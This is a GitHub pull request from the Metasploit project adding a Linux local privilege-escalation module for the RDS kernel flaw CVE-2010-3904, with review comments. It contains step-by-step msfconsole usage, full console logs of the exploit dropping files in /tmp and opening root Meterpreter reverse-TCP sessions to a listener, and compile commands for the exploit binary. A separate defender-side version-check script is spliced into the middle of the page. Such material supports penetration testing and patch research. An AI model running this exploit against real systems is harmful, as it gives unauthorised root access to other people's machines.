Add Reliable Datagram Sockets (RDS) Privilege Escalation exploit #9966

Merged
merged 5 commits into from May 18, 2018

@bcoles
Contributor

bcoles commented May 3, 2018

Add Reliable Datagram Sockets (RDS) Privilege Escalation exploit.

    This module exploits a vulnerability in the rds_page_copy_user function
    in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8
    to execute code as root (CVE-2010-3904).

    This module has been tested successfully on Fedora 13 (i686) with
    kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64)
    with kernel version 2.6.32-21-generic.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/local/rds_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Scenarios

msf5 > use exploit/linux/local/rds_priv_esc
msf5 exploit(linux/local/rds_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/rds_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(linux/local/rds_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Writing '/tmp/.zEAOL.c' (7282 bytes) ...
[*] Writing '/tmp/.kBTWC7E' (237 bytes) ...
[*] Launching exploit...
[*] Sending stage (853256 bytes) to 172.16.191.149
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.149:40103) at 2018-05-03 08:52:59 -0400
[+] Deleted /tmp/.zEAOL.c
[+] Deleted /tmp/.zEAOL
[+] Deleted /tmp/.kBTWC7E

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.149
OS           : Ubuntu 10.04 (Linux 2.6.32-21-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
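An added defender-side check, not part of this PR or the Metasploit module: it decides whether a kernel release string falls inside the affected range quoted in the module description (2.6.30 through 2.6.36-rc8, with 2.6.36 final outside it) and reports whether the rds module is currently loaded. Function names and the sample version strings are my own; the strings mirror the two kernels named in the description.

```shell
#!/bin/sh
# Added example: CVE-2010-3904 exposure check for a Linux host.
# Not the module's own check() logic; written here for defenders.

# rds_kernel_in_range VERSION
# Returns 0 when VERSION lies within 2.6.30 .. 2.6.36-rc8, 1 otherwise.
rds_kernel_in_range() {
    v="$1"
    # Split the leading dotted fields; the third field is cut at the
    # first non-digit so "32-21-generic" and "36-rc8" yield 32 and 36.
    major=$(printf '%s' "$v" | cut -d. -f1)
    minor=$(printf '%s' "$v" | cut -d. -f2)
    patch=$(printf '%s' "$v" | cut -d. -f3 | sed 's/[^0-9].*//')
    case "$major.$minor" in
        2.6) ;;
        *) return 1 ;;
    esac
    [ -n "$patch" ] || return 1
    if [ "$patch" -ge 30 ] && [ "$patch" -le 35 ]; then
        return 0
    fi
    if [ "$patch" -eq 36 ]; then
        # 2.6.36-rc1 .. -rc8 are affected; 2.6.36 final is not.
        rc=$(printf '%s' "$v" | sed -n 's/^2\.6\.36-rc\([0-9][0-9]*\).*/\1/p')
        [ -n "$rc" ] && [ "$rc" -le 8 ] && return 0
    fi
    return 1
}

# rds_module_loaded: 0 if the rds kernel module is currently loaded.
rds_module_loaded() {
    grep -q '^rds ' /proc/modules 2>/dev/null
}

# rds_report [VERSION]: evaluate the running kernel, or a version passed in.
rds_report() {
    kv="${1:-$(uname -r)}"
    if rds_kernel_in_range "$kv"; then
        echo "kernel $kv is inside the CVE-2010-3904 affected range"
    else
        echo "kernel $kv is outside the CVE-2010-3904 affected range"
    fi
    if rds_module_loaded; then
        echo "rds module is loaded"
    else
        echo "rds module is not loaded"
    fi
}
```

Run `rds_report` with no argument on the host under review; the version test alone is the part worth keeping in an inventory script, since distribution kernels also carry backported fixes that a bare version compare cannot see.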

@bcoles bcoles added module docs labels May 3, 2018

@bwatters-r7 bwatters-r7 self-assigned this May 16, 2018

@bwatters-r7

Contributor

bwatters-r7 commented May 17, 2018

Testing

Ubuntu 10.04 (Linux 2.6.32-21-generic)

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.111:4567 
[*] Sending stage (812100 bytes) to 192.168.132.178
[*] Meterpreter session 1 opened (192.168.135.111:4567 -> 192.168.132.178:59896) at 2018-05-17 11:27:22 -0500

meterpreter > sysinfo
Computer     : 192.168.132.178
OS           : Ubuntu 10.04 (Linux 2.6.32-21-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/linux/local/rds_priv_esc 
msf5 exploit(linux/local/rds_priv_esc) > show options

Module options (exploit/linux/local/rds_priv_esc):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   COMPILE      Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                       yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf5 exploit(linux/local/rds_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/rds_priv_esc) > set lhost 192.168.135.111
lhost => 192.168.135.111
msf5 exploit(linux/local/rds_priv_esc) > set lport 4512
lport => 4512
msf5 exploit(linux/local/rds_priv_esc) > run

[*] Started reverse TCP handler on 192.168.135.111:4512 
[*] Writing '/tmp/.A2XgT.c' (7282 bytes) ...
[*] Writing '/tmp/.b9kLc1l' (237 bytes) ...
[*] Launching exploit...
[*] Sending stage (853256 bytes) to 192.168.132.178
[*] Meterpreter session 2 opened (192.168.135.111:4512 -> 192.168.132.178:58416) at 2018-05-17 11:35:39 -0500
[+] Deleted /tmp/.A2XgT.c
[+] Deleted /tmp/.A2XgT
[+] Deleted /tmp/.b9kLc1l

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > 
@bwatters-r7

Contributor

bwatters-r7 commented May 17, 2018

@bcoles is there a reason you included the password in the first comment, but not in the docs? I did not use it and it is not shown as an option in standard or advanced options?

Also, since you're using a static binary, it would be nice to have compilation instructions in the markdown doc. I assume standard gcc will do it, but it is still nice to have. I'd like to land this today, so if you can't get to it today, I'll probably just add it when I land it unless you're passionate about it.

end

def exploit
if check != CheckCode::Appears


@bwatters-r7

bwatters-r7 May 17, 2018

Contributor

So I hate unless as much as the next non-ruby dev, but you used it on line 115. Just an inconsistent nitpicky thing I noticed.


@bcoles

bcoles May 17, 2018

Contributor

if was copypasta from another module. I like unless.

Edit: Fixed

@bcoles

Contributor

bcoles commented May 17, 2018

PASSWORD was copypasta from another PR. This module does not have a PASSWORD option.

Edit: Removed - [ ] set PASSWORD <PASSWORD> from PR description

@bcoles

Contributor

bcoles commented May 17, 2018

Compilation is trivial. Provided binaries are cross-compiled with musl.

./x86_64-linux-musl-gcc -o rds.x64 -pie -static rds.c 
./i486-linux-musl-gcc -o rds.x86 -pie -static rds.c 

Although they probably should have also been stripped with -s.

bcoles added some commits May 17, 2018

@bcoles

Contributor

bcoles commented May 18, 2018

I've performed the suggested modifications.

@bwatters-r7 bwatters-r7 merged commit 6858a1c into rapid7:master May 18, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

bwatters-r7 added a commit that referenced this pull request May 18, 2018

Land #9966, Add Reliable Datagram Sockets (RDS) Privilege Escalation exploit

Merge branch 'land-9966' into upstream-master
@bwatters-r7

Contributor

bwatters-r7 commented May 18, 2018

Release notes

This PR adds a privilege escalation against the Reliable Datagram Sockets (RDS) protocol on Linux kernel versions 2.6.30 to 2.6.36-rc8.

@bcoles bcoles deleted the bcoles:rds_priv_esc branch May 19, 2018

@bcoles bcoles added the rn-exploit label May 19, 2018

jmartin-r7 added a commit that referenced this pull request May 21, 2018

Land #9966, Add Reliable Datagram Sockets (RDS) Privilege Escalation exploit

Merge branch 'land-9966' into upstream-master